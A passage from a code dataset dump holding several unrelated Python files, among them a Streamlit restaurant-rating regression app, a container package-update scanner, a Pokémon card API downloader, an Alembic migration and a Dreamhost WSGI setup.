= df['votes'].replace(0, 1)\r\n\t\t\t\tdf['cost'] = np.log(df['cost'])\r\n\t\t\t\tdf['votes'] = np.log(df['votes'])\r\n\r\n\r\n\t\t\t\tst.write(\"Showing top 50 records\")\r\n\r\n\t\t\t\tst.dataframe(df.head(50))\r\n\r\n\t\t\t\tif st.checkbox(\"Show Data Types\"):\r\n\t\t\t\t\tst.write(df.dtypes)\r\n\r\n\r\n\t\t\t\t\r\n\r\n\t\t\t\tX = df.drop(['rate'],axis =1)\r\n\t\t\t\ty = df['rate']\r\n\r\n\t\t\t\tseed=st.sidebar.slider('Seed',0,200)\r\n\r\n\t\t\t\tRegressor_Model=st.sidebar.selectbox('Select your Regressor Model:',('MultiLinear','Support Vector','DecisionTree','RandomForest','ExtraTree','GradientBoosting','XGBoost','Artificial Neural Network'))\r\n\r\n\t \r\n\t\t\t\t \r\n\r\n\r\n\t\t\t\tdef add_parameter(name_of_reg):\r\n\r\n\t\t\t\t\tparams=dict()\r\n\t\t\t\t\tif name_of_reg=='RandomForest' or name_of_reg=='ExtraTree' :\r\n\r\n\t\t\t\t\t\tn=st.sidebar.slider('Select number of trees',10, 300,100)\r\n\t\t\t\t\t\tparams['n_estimators']=n\r\n\r\n\t\t\t\t\telif name_of_reg=='Artificial Neural Network':\r\n\r\n\t\t\t\t\t\tepochs=st.sidebar.slider('epochs',25,200,100)\r\n\t\t\t\t\t\tparams['epochs']=epochs\r\n\r\n\t\t\t\t\telif name_of_reg=='Support Vector':\r\n\t\t\t\t\t\tkernel = st.sidebar.selectbox('Select Kernel:',('rbf','linear','poly'))\r\n\t\t\t\t\t\tparams['kernel']=kernel\r\n\r\n\t\t\t\t\treturn params\r\n\r\n\t\t\t\t#calling the function\r\n\r\n\t\t\t\tparams=add_parameter(Regressor_Model)\r\n\r\n\t\t\t\tX_train,X_test,y_train,y_test=train_test_split(X,y,test_size=0.3, random_state=seed)\r\n\r\n\t\t\t\t#defing a function for our classifier\r\n\r\n\t\t\t\tdef get_classifier(name_of_reg,params):\r\n\t\t\t\t\treg= None\r\n\r\n\t\t\t\t\tif name_of_reg == 'MultiLinear':\r\n\t\t\t\t\t\treg = LinearRegression()\r\n\t\t\t\t\t\treg.fit(X_train,y_train)\r\n\t\t\t\t\telif name_of_reg=='Support Vector':\r\n\t\t\t\t\t\treg=SVR(kernel = params['kernel'])\r\n\t\t\t\t\t\treg.fit(X_train,y_train)\r\n\t\t\t\t\telif name_of_reg=='DecisionTree':\r\n\t\t\t\t\t\treg=DecisionTreeRegressor(random_state = 0)\r\n\t\t\t\t\t\treg.fit(X_train,y_train)\r\n\t\t\t\t\telif name_of_reg=='RandomForest':\r\n\t\t\t\t\t\treg=RandomForestRegressor(n_estimators=params['n_estimators'],random_state=0,min_samples_leaf=.0001)\r\n\t\t\t\t\t\treg.fit(X_train,y_train)\r\n\t\t\t\t\telif name_of_reg=='ExtraTree':\r\n\t\t\t\t\t\treg=ExtraTreesRegressor(n_estimators = params['n_estimators'])\r\n\t\t\t\t\t\treg.fit(X_train,y_train)\r\n\t\t\t\t\telif name_of_reg=='GradientBoosting':\r\n\t\t\t\t\t\treg=GradientBoostingRegressor(random_state=0)\r\n\t\t\t\t\t\treg.fit(X_train,y_train)\r\n\t\t\t\t\telif name_of_reg=='XGBoost':\r\n\t\t\t\t\t\treg = XGBRegressor()\r\n\t\t\t\t\t\treg.fit(X_train,y_train)\r\n\t\t\t\t\telif name_of_reg=='Artificial Neural Network':\r\n\t\t\t\t\t\treg = tf.keras.models.Sequential()\r\n\t\t\t\t\t\treg.add(tf.keras.layers.Dense(units=60, activation='relu'))\r\n\t\t\t\t\t\treg.add(tf.keras.layers.Dense(units=60, activation='relu'))\r\n\t\t\t\t\t\treg.add(tf.keras.layers.Dense(units=1))\r\n\t\t\t\t\t\treg.compile(optimizer = 'adam', loss = 'mean_squared_error')\r\n\t\t\t\t\t\treg.fit(X_train, y_train, batch_size = 32, epochs = params['epochs'])\r\n\r\n\t\t\t\t\telse:\r\n\t\t\t\t\t\tst.warning('Select your choice of algorithm')\r\n\r\n\t\t\t\t\treturn reg\r\n\r\n\t\t\t\treg=get_classifier(Regressor_Model,params)\r\n\r\n\t\t\t\ty_pred=reg.predict(X_test)\r\n\t\t\t\taccuracy=r2_score(y_test,y_pred)\r\n\r\n\t\t\t\tst.write('Name of Regressor Model:',Regressor_Model)\r\n\t\t\t\tst.write('Accuracy',accuracy)\r\n\r\n\r\n\r\n\r\n\telif option=='Predict Rating':\r\n\t\t# data = None\r\n\t\t# st.subheader(\"Predict Rating\")\r\n\r\n\t\thtml_temp = \"\"\"\r\n\t\t
\r\n\t\t

Streamlit Zomato Restaurant Rating ML App

\r\n\t\t
\r\n\t\t\"\"\"\r\n\t\tst.markdown(html_temp,unsafe_allow_html=True)\r\n\t\tst.text(\"\")\r\n\t\timage = Image.open('Zomato_1.jpg')\r\n\t\tst.image(image,use_column_width=True)\r\n\t\t\t\t\r\n\t\t\r\n\t\t# df=pd.read_csv('zomato.csv')\r\n\t\t# df['dish_liked'] = df['dish_liked'].replace(np.nan, 'not_available', regex=True)\r\n\t\t# df.drop(['url','phone','address'],axis=1,inplace= True)\r\n\t\t# df.dropna(how='any',inplace=True)\r\n\t\t# df = df.rename(columns={'approx_cost(for two people)':'cost','listed_in(type)':'type','listed_in(city)':'city'})\r\n\t\t# df['cost'] = df['cost'].apply(lambda x: x.replace(',',''))\r\n\t\t# df['cost'] = df['cost'].astype(float)\r\n\t\t# df = df.loc[df.rate !='NEW']\r\n\t\t# df = df.loc[df.rate !='-']\r\n\t\t# df['rate'] = df['rate'].apply(lambda x: x.replace('/5',''))\r\n\t\t# df['rate'] = df['rate'].astype(float)\r\n\t\t# df['reviews_list'] = df['reviews_list'].apply(lambda x : x.split(',')[0])\r\n\t\t# df['reviews_list'] = df['reviews_list'].apply(lambda x : x.split('Rated'))\r\n\t\t# df['reviews_list'] = df['reviews_list'].apply(lambda x : x[-1])\r\n\t\t# df['reviews_list'] = df['reviews_list'].apply(lambda x : x.replace('\\'',''))\r\n\t\t# df['reviews_list'] = df['reviews_list'].apply(lambda x : x.strip())\r\n\t\t# digits_in_review= pd.DataFrame(df['reviews_list'].str.replace('.','').str.isdigit()) \r\n\t\t# df = df[digits_in_review['reviews_list'] == True]\r\n\t\t# df['reviews_list'] = df['reviews_list'].astype(float)\r\n\t\t# # Feature Scaling\r\n\t\t# df.online_order[df.online_order == 'Yes'] = 1\r\n\t\t# df.online_order[df.online_order == 'No'] = 0\r\n\t\t# df.online_order = pd.to_numeric(df.online_order)\r\n\t\t# df.book_table[df.book_table == 'Yes'] = 1 \r\n\t\t# df.book_table[df.book_table == 'No'] = 0\r\n\t\t# df.book_table = pd.to_numeric(df.book_table)\r\n\t\t# top_20_location = df['location'].value_counts()[:20]\r\n\t\t# df['location'] = df['location'].apply(lambda x: x if x in top_20_location.index else 'other_location')\r\n\t\t# top_10_rest_type = df['rest_type'].value_counts()[:10]\r\n\t\t# df['rest_type'] = df['rest_type'].apply(lambda x: x if x in top_10_rest_type.index else 'other_rest_type')\r\n\t\t# top_15_cuisines= df['cuisines'].value_counts()[:15]\r\n\t\t# df['cuisines'] = df['cuisines'].apply(lambda x: x if x in top_15_cuisines.index else 'other_cuisines')\r\n\t\t# df.drop(['name','menu_item','dish_liked','city'],axis=1,inplace = True)\r\n\t\t# service_types =df['type'].value_counts()\r\n\t\t# source_dummy=pd.get_dummies(df[['location','rest_type','cuisines','type']],drop_first=True)\r\n\t\t# df=pd.concat([source_dummy,df],axis=1)\r\n\t\t# df.drop(['location','rest_type','cuisines','type'],inplace=True,axis=1)\r\n\t\t# df['votes'] = df['votes'].replace(0, 1)\r\n\t\t# df['cost'] = np.log(df['cost'])\r\n\t\t# df['votes'] = np.log(df['votes'])\r\n\t\t# X = df.drop(['rate'],axis =1)\r\n\t\t# y = df['rate']\r\n\t\t# X_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.3, random_state = 0)\r\n\r\n\r\n\t\t\r\n\t\tpickle_in = open(\"model.pkl\",\"rb\")\r\n\t\tregressor=pickle.load(pickle_in)\r\n\r\n\t\tcolumn_train = ['location_Banashankari', 'location_Bannerghatta Road',\r\n\t\t\t\t\t\t'location_Bellandur', 'location_Brigade Road',\r\n\t\t\t\t\t\t'location_Electronic City', 'location_HSR', 'location_Indiranagar',\r\n\t\t\t\t\t\t'location_JP Nagar', 'location_Jayanagar',\r\n\t\t\t\t\t\t'location_Koramangala 1st Block', 'location_Koramangala 4th Block',\r\n\t\t\t\t\t\t'location_Koramangala 5th Block', 'location_Koramangala 6th Block',\r\n\t\t\t\t\t\t'location_Koramangala 7th Block', 'location_MG Road',\r\n\t\t\t\t\t\t'location_Marathahalli', 'location_Sarjapur Road', 'location_Ulsoor',\r\n\t\t\t\t\t\t'location_Whitefield', 'location_other_location', 'rest_type_Bar',\r\n\t\t\t\t\t\t'rest_type_Beverage Shop', 'rest_type_Cafe', 'rest_type_Casual Dining',\r\n\t\t\t\t\t\t'rest_type_Casual Dining, Bar', 'rest_type_Delivery',\r\n\t\t\t\t\t\t'rest_type_Dessert Parlor', 'rest_type_Quick Bites',\r\n\t\t\t\t\t\t'rest_type_Takeaway, Delivery', 'rest_type_other_rest_type',\r\n\t\t\t\t\t\t'cuisines_Bakery, Desserts', 'cuisines_Biryani', 'cuisines_Cafe',\r\n\t\t\t\t\t\t'cuisines_Chinese', 'cuisines_Chinese, North Indian',\r\n\t\t\t\t\t\t'cuisines_Desserts', 'cuisines_Fast Food',\r\n\t\t\t\t\t\t'cuisines_Ice Cream, Desserts', 'cuisines_Mithai, Street Food',\r\n\t\t\t\t\t\t'cuisines_North Indian', 'cuisines_North Indian, Chinese',\r\n\t\t\t\t\t\t'cuisines_North Indian, Chinese, Biryani', 'cuisines_South Indian',\r\n\t\t\t\t\t\t'cuisines_South Indian, North Indian, Chinese',\r\n\t\t\t\t\t\t'cuisines_other_cuisines', 'type_Cafes', 'type_Delivery',\r\n\t\t\t\t\t\t'type_Desserts', 'type_Dine-out', 'type_Drinks & nightlife',\r\n\t\t\t\t\t\t'type_Pubs and bars', 'online_order', 'book_table', 'votes', 'cost',\r\n\t\t\t\t\t\t'reviews_list']\r\n\r\n\r\n\r\n\r\n\r\n\t\tLocation=['BTM', 'Koramangala 5th Block', 'HSR', 'Indiranagar', 'JP Nagar',\r\n\t\t\t\t'Jayanagar', 'Whitefield', 'Marathahalli', 'Bannerghatta Road',\r\n\t\t\t\t'Brigade Road', 'Koramangala 7th Block', 'Koramangala 6th Block',\r\n\t\t\t\t'Bellandur', 'Sarjapur Road', 'Koramangala 1st Block',\r\n\t\t\t\t'Koramangala 4th Block', 'Ulsoor', 'Electronic City', 'MG Road',\r\n\t\t\t\t'Banashankari']\r\n\t\tLocation.append('other_location')\r\n\t\tLocation=st.selectbox('Select Location:',Location)\r\n\r\n\t\tRest_type = ['Quick Bites', 'Casual Dining', 'Cafe', 'Dessert Parlor', 'Delivery',\r\n\t\t\t\t\t'Takeaway, Delivery', 'Casual Dining, Bar', 'Bakery', 'Beverage Shop',\r\n\t\t\t\t\t'Bar']\r\n\t\tRest_type.append('other_rest_type')\r\n\t\tRest_type = st.selectbox('Select Restaurant Type:',Rest_type)\r\n\r\n\t\tCuisines = ['North Indian', 'North Indian, Chinese', 'South Indian',\r\n\t\t\t\t\t'Bakery, Desserts', 'Cafe', 'South Indian, North Indian, Chinese',\r\n\t\t\t\t\t'Desserts', 'Biryani', 'Fast Food', 'Chinese', 'Ice Cream, Desserts',\r\n\t\t\t\t\t'Bakery', 'Chinese, North Indian', 'Mithai, Street Food',\r\n\t\t\t\t\t'North Indian, Chinese, Biryani']\r\n\t\tCuisines.append('other_cuisines')\r\n\t\tCuisines = st.selectbox('Select cuisines :',Cuisines)\r\n\r\n\t\tService_type = ['Delivery', 'Dine-out', 'Desserts', 'Cafes', 'Drinks & nightlife',\r\n\t\t\t\t\t\t'Buffet', 'Pubs and bars']\r\n\t\tService_type = st.selectbox('Select service type :',Service_type)\r\n\r\n\t\tOnline_order = ['Yes','No']\r\n\t\tOnline_order = st.selectbox('Select online order available :',Online_order)\r\n\r\n\t\tBook_table = ['Yes','No']\r\n\t\tBook_table = st.selectbox('Select book table available :',Book_table)\r\n\r\n\r\n\t\tReviews_list= [1.0,1.5,2.0,2.5,3.0,3.5,4.0,4.5,5.0]\r\n\t\tReviews_list = st.selectbox(\"Rating given by user:\",Reviews_list)\r\n\r\n\r\n\t\tVotes = st.text_input(\"Total Votes given:(Please enter votes e.g 700)\",700)\r\n\t\t\r\n\t\tCost = st.text_input(\"Approximate cost for two people:(Please enter price e.g 800)\",800)\r\n\r\n\r\n\t\t# INPUT \r\n\r\n\t\t#Location\r\n\r\n\t\tlocations_train_column = column_train[:20]\r\n\t\tlocations_input =[0]*20\r\n\t\tlocations_column = []\r\n\t\tfor location in locations_train_column:\r\n\r\n\t\t\tnew_location = location.replace(\"location_\",\"\")\r\n\t\t\tlocations_column.append(new_location)\r\n\r\n\t\tfor i in range(20):\r\n\t\t\tif locations_column[i]==Location:\r\n\t\t\t\tlocations_input[i] =1\r\n\r\n\t\t#Rest_type\r\n\t\trest_type_train_column = column_train[20:30]\r\n\t\trest_type_input =[0]*10\r\n\t\trest_type_column = []\r\n\t\tfor rest_type in rest_type_train_column:\r\n\t\t\tnew_rest_type = rest_type.replace(\"rest_type_\",\"\")\r\n\t\t\trest_type_column.append(new_rest_type)\r\n\t\tfor i in range(10):\r\n\t\t\tif rest_type_column[i]==Rest_type:\r\n\t\t\t\trest_type_input[i] =1\r\n\r\n\t\t# cuisines\r\n\t\tcuisines_train_column = column_train[30:45]\r\n\t\tcuisines_input =[0]*15\r\n\t\tcuisines_column = []\r\n\t\tfor cuisines in cuisines_train_column:\r\n\t\t\tnew_cuisines = cuisines.replace(\"cuisines_\",\"\")\r\n\t\t\tcuisines_column.append(new_cuisines)\r\n\t\tfor i in range(15):\r\n\t\t\tif cuisines_column[i]==Cuisines:\r\n\t\t\t\tcuisines_input[i]=1\r\n\r\n\t\t## Service _type\r\n\t\tservice_type_train_column = column_train[45:51]\r\n\t\tservice_type_input =[0]*6\r\n\t\tservice_type_column = []\r\n\t\tfor service_type in service_type_train_column:\r\n\t\t\tnew_service_type = service_type.replace(\"type_\",\"\")\r\n\t\t\tservice_type_column.append(new_service_type)\r\n\t\tfor i in range(6):\r\n\t\t\tif service_type_column[i]==Service_type:\r\n\t\t\t\tservice_type_input[i]=1\r\n\r\n\t\t#online_order\r\n\t\tonline_order_input = []\r\n\t\tif Online_order=='Yes':\r\n\r\n\t\t\tnew_online_order = 1\r\n\t\t\tonline_order_input.append(new_online_order)\r\n\t\telse:\r\n\t\t\tnew_online_order = 0\r\n\t\t\tonline_order_input.append(new_online_order)\r\n\r\n\t\t# book_table\r\n\t\tbook_table_input = []\r\n\t\tif Book_table=='Yes':\r\n\t\t\tnew_book_table = 1\r\n\t\t\tbook_table_input.append(new_book_table)\r\n\t\telse:\r\n\t\t\tnew_book_table = 0\r\n\t\t\tbook_table_input.append(new_book_table)\r\n\r\n\t\t# votes\r\n\t\tvotes_input = [np.log(int(Votes))]\r\n\t\t# Cost\r\n\t\tcost_input = [np.log(float(Cost))]\r\n\t\t# reviews_list\r\n\t\treview_list_input = [Reviews_list]\r\n\r\n\r\n\r\n\r\n\t\tinput = locations_input + rest_type_input + cuisines_input + service_type_input + online_order_input + book_table_input + votes_input + cost_input + review_list_input \r\n\r\n\t\tprediction=regressor.predict([input])\r\n\r\n\t\t\t \r\n\r\n \r\n\r\n\r\n\r\n\t\tif st.button(\"Predict\"):\r\n\t\t\tst.success('Restaurant rating is {}'.format(round(prediction[0],2)))\r\n\t\t\t\r\n\r\n \r\n\t\t\r\n\r\n\r\n\r\n#DEALING WITH THE ABOUT US PAGE\r\n\r\n\r\n\r\n\r\n\telif option=='About us':\r\n\r\n\t\timage = Image.open('Zomato_1.jpg')\r\n\t\tst.image(image,use_column_width=True)\r\n\r\n\t\tst.markdown('''\r\n\t\t\t\r\n\r\n\t\t\tZomato is one of the best online food delivery apps which gives the users the ratings and the reviews on restaurants all over india.These ratings and the Reviews are considered as one of the most important deciding factors which determine how good a restaurant is.\r\n\r\nWe will therefore use the real time Data set with variuos features a user would look into regarding a restaurant. We will be considering Banglore City in this analysis.\r\n\r\nContent The basic idea of analyzing the Zomato dataset is to get a fair idea about the factors affecting the establishment of different types of restaurant at different places in Bengaluru, aggregate rating of each restaurant, Bengaluru being one such city has more than 12,000 restaurants with restaurants serving dishes from all over the world.\r\n\r\nWith each day new restaurants opening the industry has’nt been saturated yet and the demand is increasing day by day. Inspite of increasing demand it however has become difficult for new restaurants to compete with established restaurants. Most of them serving the same food. Bengaluru being an IT capital of India. Most of the people here are dependent mainly on the restaurant food as they don’t have time to cook for themselves.\r\n\r\nWith such an overwhelming demand of restaurants it has therefore become important to study the demography of a location. What kind of a food is more popular in a locality. Do the entire locality loves vegetarian food. If yes then is that locality populated by a particular sect of people for eg. Jain, Marwaris, Gujaratis who are mostly vegetarian. These kind of analysis can be done using the data, by studying the factors such as\r\n\r\n• Location of the restaurant\r\n• Approx Price of food\r\n• Theme based restaurant or not\r\n• Which locality of that city serves that cuisines with maximum number of restaurants\r\n• The needs of people who are striving to get the best cuisine of the neighborhood\r\n• Is a particular neighborhood famous for its own kind of food.\r\n“Just so that you have a good meal the next time you step out”\r\n\r\nThe data is accurate to that available on the zomato website until 15 March 2019. The data was scraped from Zomato in two phase. After going through the structure of the website I found that for each neighborhood there are 6-7 category of restaurants viz. Buffet, Cafes, Delivery, Desserts, Dine-out, Drinks & nightlife, Pubs and bars.\r\n\r\nPhase I,\r\n\r\nIn Phase I of extraction only the URL, name and address of the restaurant were extracted which were visible on the front page. The URl's for each of the restaurants on the zomato were recorded in the csv file so that later the data can be extracted individually for each restaurant. This made the extraction process easier and reduced the extra load on my machine. The data for each neighborhood and each category can be found here\r\n\r\nPhase II,\r\n\r\nIn Phase II the recorded data for each restaurant and each category was read and data for each restaurant was scraped individually. 15 variables were scraped in this phase. For each of the neighborhood and for each category their onlineorder, booktable, rate, votes, phone, location, resttype, dishliked, cuisines, approxcost(for two people), reviewslist, menu_item was extracted. See section 5 for more details about the variables.\r\n\r\nAcknowledgements The data scraped was entirely for educational purposes only. Note that I don’t claim any copyright for the data. All copyrights for the data is owned by Zomato Media Pvt. Ltd..\r\n\r\n Source: Kaggle\r\n \r\n '''\r\n\t\t\t)\r\n\r\n\r\n\t\tst.balloons()\r\n\r\n\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n\tmain() \r\n","sub_path":"ZomatoRating_2.py","file_name":"ZomatoRating_2.py","file_ext":"py","file_size_in_byte":33672,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"179587511","text":"#!/usr/bin/python\n\"\"\"This class is for checking updates from different other packagers.\"\"\"\nimport os\n\nfrom container_pipeline.scanners.base import Scanner\n\n\nclass MiscPackageUpdates(Scanner):\n \"\"\"Checks updates for packages other than RPM.\"\"\"\n\n def __init__(self):\n \"\"\"Name it to Misc Package update check.\"\"\"\n self.scanner_name = \"misc-package-updates\"\n self.full_scanner_name = \\\n \"registry.centos.org/pipeline-images/misc-package-updates\"\n self.scan_types = [\"pip-updates\", \"npm-updates\", \"gem-updates\"]\n\n def scan(self, image_under_test):\n \"\"\"Run the scanner.\"\"\"\n # initializing a blank list that will contain results from all the\n # scan types of this scanner\n logs = []\n super(MiscPackageUpdates, self).__init__(\n image_under_test=image_under_test,\n scanner_name=self.scanner_name,\n full_scanner_name=self.full_scanner_name,\n to_process_output=False\n )\n\n os.environ[\"IMAGE_NAME\"] = self.image_under_test\n\n for _ in self.scan_types:\n scan_cmd = [\n \"atomic\",\n \"scan\",\n \"--scanner={}\".format(self.scanner_name),\n \"--scan_type={}\".format(_),\n \"{}\".format(image_under_test)\n ]\n\n scan_results = super(MiscPackageUpdates, self).scan(scan_cmd)\n\n if not scan_results[0]:\n return False, None\n\n logs.append(scan_results[1])\n\n return True, self.process_output(logs)\n\n def process_output(self, logs):\n \"\"\"\n Genaralising output.\n\n Processing data for this scanner is unlike other scanners\n because, for this scanner we need to send logs of three\n different scan types of same atomic scanner unlike other\n atomic scanners which have only one, and hence treated\n as default, scan type\n \"\"\"\n data = {}\n data[\"scanner_name\"] = self.scanner_name\n data[\"msg\"] = \"\"\n for i in logs:\n data[\"msg\"] += i[\"Summary\"]\n data[\"logs\"] = logs\n\n return data\n","sub_path":"container_pipeline/scanners/misc_package_updates.py","file_name":"misc_package_updates.py","file_ext":"py","file_size_in_byte":2143,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"67849937","text":"\n\nfrom xai.brain.wordbase.nouns._burger import _BURGER\n\n#calss header\nclass _BURGERS(_BURGER, ):\n\tdef __init__(self,): \n\t\t_BURGER.__init__(self)\n\t\tself.name = \"BURGERS\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"burger\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_burgers.py","file_name":"_burgers.py","file_ext":"py","file_size_in_byte":238,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"125747882","text":"\n\n#calss header\nclass _DEVICE():\n\tdef __init__(self,): \n\t\tself.name = \"DEVICE\"\n\t\tself.definitions = [u'an object or machine that has been invented for a particular purpose: ', u'a machine, for example a phone or computer, that can be used to connect to the internet: ', u'a method that is used to produce a particular effect: ', u'a bomb or other explosive: ']\n\n\t\tself.parents = []\n\t\tself.childen = []\n\t\tself.properties = []\n\t\tself.jsondata = {}\n\n\n\t\tself.specie = 'nouns'\n\n\n\tdef run(self, obj1 = [], obj2 = []):\n\t\treturn self.jsondata\n","sub_path":"xai/brain/wordbase/nouns/_device.py","file_name":"_device.py","file_ext":"py","file_size_in_byte":535,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"465743222","text":"import requests\nimport pandas as pd\nimport os\n\napi_file = \"api-key/key\"\n\nbase_uri = \"https://api.pokemontcg.io/v2/\"\n\n\ndef get_file_contents(filename):\n \"\"\"Given a filename,\n return the contents of that file\n \"\"\"\n try:\n with open(filename, \"r\") as f:\n # It's assumed our file contains a single line,\n # with our API key\n return f.read().strip()\n except FileNotFoundError:\n print(\"'%s' file not found\" % filename)\n\n\nmy_key = get_file_contents(api_file)\nheaders = {\"X-Api-Key\": my_key}\n\n\ndef get_sets(query):\n \"\"\"queries the sets and stores a list of all sets\"\"\"\n params = {\"q\": query, \"orderBy\": \"releaseDate\"}\n endpoint = \"sets/\"\n url = base_uri + endpoint\n response = requests.get(url, params=params, headers=headers).json()[\"data\"]\n return response\n\n\ndef search_cards(query):\n \"\"\"returns a list of cards (as dicts) based on the query\"\"\"\n params = {\"q\": query, \"orderBy\": \"releaseDate\"}\n endpoint = \"cards/\"\n url = base_uri + endpoint\n response = requests.get(url, params=params, headers=headers).json()[\"data\"]\n return response\n\n\ndef save_search_to_pickle(items, filename):\n \"\"\"writes a search result list to data/filename.pickle\"\"\"\n df = pd.DataFrame(items)\n df.to_pickle(path=f\"data/{filename}.pickle\")\n\n\n# def download_cards(query, download_images=False):\n# \"\"\"takes a query, fetches card data, saves it as pickle, and fetches all the hi-res images\"\"\"\n# card_list = search_cards(query)\n# save_search_to_pickle(card_list, query[7:])\n# if download_images:\n# os.makedirs(f\"data/img/{query[7:]}\", exist_ok=True)\n# for card in card_list:\n# print(f\"{card['name']} is being downloaded.\")\n# r = requests.get(url=card[\"images\"][\"large\"], headers=headers)\n# open(f\"data/img/{query[7:]}/{card['id']}-{card['name']}.png\", \"wb\").write(\n# r.content\n# )\n\n\ndef download_cards(query, download_images=False):\n \"\"\"takes a query, fetches card data, saves it as pickle, and fetches all the hi-res images\"\"\"\n counter = 0\n card_list = search_cards(query)\n save_search_to_pickle(card_list, query[7:])\n if download_images:\n for card in card_list:\n if card[\"supertype\"] == \"Pokémon\":\n counter += 1\n print(counter)\n print(f\"{card['name']} is being downloaded.\")\n r = requests.get(url=card[\"images\"][\"large\"], headers=headers)\n try:\n pokémon_num = card[\"nationalPokedexNumbers\"][0]\n path = f\"data/img/per_pokemon/{pokémon_num}\"\n os.makedirs(path, exist_ok=True)\n open(f\"{path}/{card['id']}-{card['name']}.png\", \"wb\").write(\n r.content\n )\n except:\n print(f\"could not find pokemon number in {card['name']}\")\n","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2948,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"386318744","text":"\"\"\"Profiles model\n\nRevision ID: 27953385e40d\nRevises: e53f3aa8b1c3\nCreate Date: 2020-05-01 23:34:36.463006\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '27953385e40d'\ndown_revision = 'e53f3aa8b1c3'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('service_catalog',\n sa.Column('service_id', sa.Integer(), nullable=False),\n sa.Column('service_name', sa.String(length=128), nullable=True),\n sa.PrimaryKeyConstraint('service_id')\n )\n op.create_index(op.f('ix_service_catalog_service_name'), 'service_catalog', ['service_name'], unique=True)\n op.create_table('user',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('username', sa.String(length=64), nullable=True),\n sa.Column('email', sa.String(length=120), nullable=True),\n sa.Column('password', sa.String(length=128), nullable=True),\n sa.Column('roles', sa.String(length=64), nullable=True),\n sa.PrimaryKeyConstraint('id'),\n sa.UniqueConstraint('email')\n )\n op.create_index(op.f('ix_user_roles'), 'user', ['roles'], unique=False)\n op.create_index(op.f('ix_user_username'), 'user', ['username'], unique=True)\n op.create_table('pricelist',\n sa.Column('price_id', sa.Integer(), nullable=False),\n sa.Column('service_id', sa.Integer(), nullable=True),\n sa.Column('user_id', sa.Integer(), nullable=True),\n sa.Column('price', sa.Integer(), nullable=False),\n sa.Column('description', sa.Text(), nullable=True),\n sa.ForeignKeyConstraint(['service_id'], ['service_catalog.service_id'], ),\n sa.ForeignKeyConstraint(['user_id'], ['user.id'], ),\n sa.PrimaryKeyConstraint('price_id')\n )\n op.create_table('profile',\n sa.Column('profile_id', sa.Integer(), nullable=False),\n sa.Column('user_id', sa.Integer(), nullable=True),\n sa.Column('city', sa.String(length=64), nullable=False),\n sa.Column('about', sa.Text(), nullable=True),\n sa.Column('Instagram', sa.Text(), nullable=False),\n sa.Column('contacts', sa.Text(), nullable=False),\n sa.ForeignKeyConstraint(['user_id'], ['user.id'], ),\n sa.PrimaryKeyConstraint('profile_id')\n )\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_table('profile')\n op.drop_table('pricelist')\n op.drop_index(op.f('ix_user_username'), table_name='user')\n op.drop_index(op.f('ix_user_roles'), table_name='user')\n op.drop_table('user')\n op.drop_index(op.f('ix_service_catalog_service_name'), table_name='service_catalog')\n op.drop_table('service_catalog')\n # ### end Alembic commands ###\n","sub_path":"migrations/versions/27953385e40d_profiles_model.py","file_name":"27953385e40d_profiles_model.py","file_ext":"py","file_size_in_byte":2724,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"61918265","text":"from configparser import ConfigParser #Nos ayuda a leer o escribir archivos ini\n\ndef get_configuration_data(filename=\"bd.ini\",section=\"postgresql\"):#tiene parametros estaticos\n parser=ConfigParser()#Creamos el analizador\n parser.read(filename)#Leemos el archivo bd.ini\n \n #Obtener la seccion postgresql del archivo bd.ini para la conexion a la base de dtos\n db={}\n \n if parser.has_section(section):#Comprobamos si la seccion postgresql existe\n params=parser.items(section)#Obtenemos los parametros de la seccion\n for param in params:#Recorremos los parametros 1 a 1\n db[param[0]]=param[1]\n else:\n raise Exception('La Seccion {0} no se encontro en el archivo {1}'.format(seccion, archivo))#En caso de que no se encuentre la secicon se lanza esta excepcion\n \n return db#retornamos los datos\n","sub_path":"db_config.py","file_name":"db_config.py","file_ext":"py","file_size_in_byte":851,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"381944788","text":"##### DREAMHOST SPECIFIC SETTINGS #####\n\nimport sys, os\n\nINTERP = '/home/acslater/.virtualenvs/iris-prod/bin/python'\n\nif sys.executable != INTERP:\n os.execl(INTERP, INTERP, *sys.argv)\n\ncwd = os.getcwd()\nmyapp_directory = os.path.join(cwd, \"/iris\")\nsys.stdout = sys.stderr\n\nsys.path.insert(0, myapp_directory)\nsys.path.append(cwd)\n\nos.environ['SITE_ENV'] = 'prod'\nos.environ['DJANGO_SETTINGS_MODULE'] = 'iris.settings'\n\nimport django.core.handlers.wsgi\nfrom paste.exceptions.errormiddleware import ErrorMiddleware\n\napplication = django.core.handlers.wsgi.WSGIHandler()\n\ndef testapplication(environ, start_response):\n status = '200 OK'\n output = 'Hello World! Running Python version ' + sys.version + '\\n\\n'\n response_headers = [('Content-type', 'text/plain'),\n ('Content-Length', str(len(output)))]\n # to test paste's error catching prowess, uncomment the following line\n # while this function is the \"application\"\n #raise(\"error\")\n start_response(status, response_headers)\n return [output]\n\napplication = ErrorMiddleware(application, debug=True)","sub_path":"passenger_wsgi.py","file_name":"passenger_wsgi.py","file_ext":"py","file_size_in_byte":1093,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"160591422","text":"#!/usr/bin/env python\n# -*- coding: utf-8 